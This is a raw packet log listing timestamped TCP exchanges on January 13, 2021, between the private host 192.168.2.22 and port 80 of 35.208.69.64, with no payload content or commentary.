Jan 13, 2021 16:31:49.335169077 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335184097 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335201025 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335218906 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335222960 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.335237980 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335248947 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.335256100 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335273027 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335295916 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.335323095 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.489233971 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.489262104 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.489274979 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.489289045 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.489473104 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500291109 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500327110 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500349998 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500371933 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500374079 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500399113 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500420094 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500427008 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500449896 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500474930 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500479937 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500505924 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500524998 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500530005 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500556946 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500580072 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500600100 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500602961 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500627995 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500647068 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500649929 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500679016 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500700951 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500705957 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500730991 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500751019 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500874043 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500899076 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500921965 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500921965 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500952959 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.500962973 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.500981092 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501003027 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501025915 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501043081 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.501049995 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501065969 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.501100063 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501122952 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501144886 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.501151085 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501176119 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501194954 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.501247883 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501286983 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.501425982 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501446009 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501457930 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501471043 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501487017 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.501600981 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.502398968 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.644156933 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644201040 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644232988 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644263983 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644263983 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.644294977 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644328117 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.644337893 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644371033 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644397020 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.644419909 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.644474983 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.655431986 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655478001 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655505896 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655530930 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655564070 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655600071 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655625105 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.655652046 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655666113 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.655698061 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655744076 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655756950 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.655788898 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655828953 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655858040 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.655868053 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655910969 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655936003 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.655955076 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.655988932 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656016111 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.656028032 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656064987 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656086922 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.656095028 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656133890 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656166077 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.656169891 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656213999 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656230927 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.656255960 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656295061 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656322002 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.656332970 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656366110 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656392097 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.656395912 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656451941 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.656909943 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656944036 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.656975985 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657006025 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657006979 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.657037020 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657067060 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657077074 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.657109022 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657136917 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.657147884 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657181025 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657212019 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657212973 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.657258987 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657274961 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.657294989 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657324076 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657351017 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.657354116 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657407999 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.657419920 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.799089909 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.799122095 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.799137115 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.799154043 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.799170971 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.799191952 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.799209118 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.799371004 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811024904 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811063051 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811084032 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811111927 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811140060 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811161041 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811186075 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811212063 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811218023 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811250925 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811254978 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811281919 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811307907 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811314106 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811331987 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811358929 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811388016 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811391115 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811410904 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811433077 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811450958 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811471939 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811536074 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811551094 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811563015 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811584949 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811609030 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811667919 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811693907 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811706066 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811758995 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811785936 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.811784029 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.811855078 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.812027931 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812053919 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812077999 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812107086 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812124014 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.812180996 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812185049 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.812211037 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812235117 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812256098 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812283039 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812298059 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.812306881 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812335968 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812346935 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.812361956 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812428951 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.812438965 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812463999 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.812526941 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.814516068 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954150915 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954188108 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954220057 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954245090 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954267979 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954288960 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954309940 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954339027 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954361916 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954381943 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954394102 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954404116 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954425097 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954427958 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954452991 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954456091 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954480886 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954503059 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954508066 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954534054 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954543114 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954556942 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954577923 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954601049 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954606056 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954647064 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954668999 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954701900 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954724073 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954749107 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954750061 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954776049 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954797983 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954798937 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954823017 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954845905 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954885006 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954925060 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954936028 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.954947948 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.954968929 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955002069 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955029011 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955043077 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955091000 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955142975 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955178976 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955219030 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955250978 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955275059 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955284119 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955336094 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955360889 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955367088 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955419064 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955431938 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955476999 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955543995 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955574989 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955660105 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955698967 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955722094 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955744028 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955765963 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955789089 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955823898 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955825090 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955857038 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955879927 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955887079 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955919027 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955945015 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.955948114 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955976963 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.955992937 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.956007957 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.956037998 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.956060886 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.956080914 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.956093073 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.956161022 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.966257095 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966291904 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966309071 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966326952 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966398954 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.966552019 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966578007 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966597080 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966619968 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.966626883 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966636896 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.966653109 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966672897 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966695070 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966716051 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.966717958 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966727018 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.966742992 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966766119 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.966788054 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967063904 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967089891 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967118025 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967135906 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967144012 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967168093 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967169046 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967190981 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967211962 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967215061 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967233896 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967255116 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967256069 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967277050 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967297077 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967298031 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967324972 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967335939 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967417955 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967535973 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967557907 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967582941 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967596054 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967609882 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967632055 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967653036 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967653036 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967677116 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967695951 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967700005 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967719078 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967736006 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.967740059 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967768908 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.967787027 CET	49167	80	192.168.2.22	35.208.69.64
